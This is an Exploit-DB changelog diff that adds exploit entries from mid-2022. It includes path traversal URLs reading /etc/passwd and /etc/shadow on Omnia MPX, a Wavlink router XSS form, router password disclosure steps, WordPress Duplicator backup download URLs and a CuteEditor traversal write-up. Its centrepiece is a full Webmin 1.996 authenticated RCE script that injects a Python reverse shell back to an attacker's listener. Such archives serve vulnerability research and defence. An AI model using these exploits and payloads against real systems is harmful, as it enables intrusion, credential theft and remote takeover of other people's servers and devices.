DB: 2022-08-02

19 changes to exploits/shellcodes

Omnia MPX 1.5.0+r1 - Path Traversal
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
Wavlink WN533A8 - Cross-Site Scripting (XSS)
Wavlink WN530HG4 - Password Disclosure
Wavlink WN533A8 - Password Disclosure
WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
WordPress Plugin Duplicator 1.4.7 - Information Disclosure
CuteEditor for PHP 6.6 - Directory Traversal
mPDF 7.0 - Local File Inclusion
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)

Author: Offensive Security

exploits/hardware/remote/50996.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
+# Date: 24/7/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.telosalliance.com/
+# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
+# Version: 1.5.0+r1
+# Tested on: MacOS
+# PoC:
+http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
+http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow
+
+User Database:
+http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json

exploits/hardware/webapps/50989.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: M33A8.V5030.190716
+# Vendor home page : wavlink.com
+# Authentication Required: No
+# CVE : CVE-2022-34048
+# Tested on: Windows
+
+# Poc code
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
+      <input type="hidden" name="newUI" value="1" />
+      <input type="hidden" name="page" value="login" />
+      <input type="hidden" name="username" value="admin" />
+      <input type="hidden" name="langChange" value="0" />
+     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
+      <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
+      <input type="hidden" name="homepage" value="main&#46;shtml" />
+      <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
+      <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
+      <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
+      <input type="hidden" name="key" value="M94947765" />
+      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
+      <input type="hidden" name="lang&#95;select" value="en" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/hardware/webapps/50990.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Wavlink WN533A8 - Password Disclosure
+# Date: 2022-06-12
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: M33A8.V5030.190716
+# Vendor home page : wavlink.com
+# Authentication Required: No
+# CVE : CVE-2022-34046
+# Tested on: Windows
+
+# Exploit
+
+view-source:http://IP_ADDRESS/sysinit.shtml
+search for var syspasswd="
+you will find the username and the password

exploits/hardware/webapps/50991.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Wavlink WN530HG4 - Password Disclosure
+# Date: 2022-06-12
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: M30HG4.V5030.191116
+# Vendor home page : wavlink.com
+# Authentication Required: No
+# CVE : CVE-2022-34047
+# Tested on: Windows
+
+# Exploit
+
+view-source:http://IP_address/set_safety.shtml?r=52300
+search for var syspasswd="
+you will find the username and the password

exploits/linux/webapps/50998.py

@@ -0,0 +1,81 @@
+# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-07-25
+# Exploit Author: Emir Polat
+# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
+# Vendor Homepage: https://www.webmin.com/
+# Software Link: https://www.webmin.com/download.html
+# Version: < 1.997
+# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
+# CVE: CVE-2022-36446
+
+import argparse
+import requests
+from bs4 import BeautifulSoup
+
+def login(args):
+    global session
+    global sysUser
+
+    session = requests.Session()
+    loginUrl = f"{args.target}:10000/session_login.cgi"
+    infoUrl = f"{args.target}:10000/sysinfo.cgi"
+
+    username = args.username
+    password = args.password
+    data = {'user': username, 'pass': password}
+
+    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
+    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})
+
+    bs = BeautifulSoup(sysInfo.text, 'html.parser')
+    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]
+
+    if sysUser:
+        return True
+    else:
+        return False
+
+def exploit(args):
+    payload = f"""
+    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
+    os.dup2(s.fileno(),0);
+    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
+    """
+
+    updateUrl = f"{args.target}:10000/package-updates"
+    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"
+
+    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}
+
+    if login(args):
+        print("[+] Successfully Logged In !")
+        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
+        print(f"[+] User Found  => {sysUser[0]}")
+
+        res = session.get(updateUrl)
+        bs = BeautifulSoup(res.text, 'html.parser')
+
+        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
+
+        if updateAccess[0] == "package-updates":
+            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
+            print(f"[+] Exploit starting ... ")
+            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")
+
+            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
+            session.post(exploitUrl, data=exploitData)
+        else:
+            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
+    else:
+        print("[-] Login Failed !")
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
+    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
+    parser.add_argument('-u', '--username', help='Username For Login', required=True)
+    parser.add_argument('-p', '--password', help='Password For Login', required=True)
+    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
+    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
+    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
+    args = parser.parse_args()
+    exploit(args)

exploits/php/webapps/50075.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date 30.06.2021
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html

exploits/php/webapps/50076.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date 30.06.2021
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html

exploits/php/webapps/50992.txt

@@ -0,0 +1,22 @@
+# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
+# Google Dork: N/A
+# Date: 07.27.2022
+# Exploit Author: SecuriTrust
+# Vendor Homepage: https://snapcreek.com/
+# Software Link: https://wordpress.org/plugins/duplicator/
+# Version: < 1.4.7
+# Tested on: Linux, Windows
+# CVE : CVE-2022-2551
+# Reference: https://securitrust.fr
+# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551
+
+#Product:
+WordPress Plugin Duplicator < 1.4.7
+
+#Vulnerability:
+1-It allows an attacker to download the backup file.
+
+#Proof-Of-Concept:
+1-Backup download.
+The backup file can be downloaded using the "is_daws" parameter.
+http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

exploits/php/webapps/50993.txt

@@ -0,0 +1,22 @@
+# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure
+# Google Dork: N/A
+# Date: 07.27.2022
+# Exploit Author: SecuriTrust
+# Vendor Homepage: https://snapcreek.com/
+# Software Link: https://wordpress.org/plugins/duplicator/
+# Version: <= 1.4.7
+# Tested on: Linux, Windows
+# CVE : CVE-2022-2552
+# Reference: https://securitrust.fr
+# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552
+
+#Product:
+WordPress Plugin Duplicator <= 1.4.7
+
+#Vulnerability:
+1-Some system information may be disclosure.
+
+#Proof-Of-Concept:
+1-System information.
+Some system information is obtained using the "view" parameter.
+http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

exploits/php/webapps/50994.txt

@@ -0,0 +1,82 @@
+# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
+# Google Dork: N/A
+# Date: November 17th, 2021
+# Exploit Author: Stefan Hesselman
+# Vendor Homepage: http://phphtmledit.com/
+# Software Link: http://phphtmledit.com/download/phphtmledit.zip
+# Version: 6.6
+# Tested on: Windows Server 2019
+# CVE : N/A
+
+There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.
+
+File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121
+
+Vulnerable code:
+[SNIP]
+	function ServerMapPath($input_path,$absolute_path,$virtual_path)
+	{
+	  if($absolute_path!="")
+	  {
+		return $absolute_path.str_ireplace($virtual_path,"",$input_path);
+	  }
+	  else
+	  {
+		if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
+		{
+if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {
+	$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
+}
+if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {
+  $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
+}
+				return $_SERVER["DOCUMENT_ROOT"].$input_path;
+		}
+		else
+		{
+			return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;
+		}
+	  }
+	}
+[SNIP]
+
+ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.
+
+File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56
+
+Vulnerable function (renamefile, line 57):
+[SNIP]
+switch ($action)
+{
+[SNIP]
+	case "renamefile":
+		rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
+		print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
+		break;
+[SNIP]
+
+$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:
+
+C:\Inetpub\wwwroot\..\..\..\poc.html
+
+Final result: writes poc.html to the webroot.
+
+STEPS:
+
+1. Create a poc.html file (XSS PoC will do).
+
+<HTML>
+<title>Path Traversal PoC</title>
+<BODY>
+<h1>PoC</h1>
+<script>alert('directory traversal');</script>
+</BODY>
+</HTML>
+
+2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
+3. Select poc.html and select "Rename File".
+4. Click on the pencil icon to the right of the poc.html file.
+5. Rename file to "..\..\..\poc.html".
+6. Press OK. poc.html is written three directories up.
+
+This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.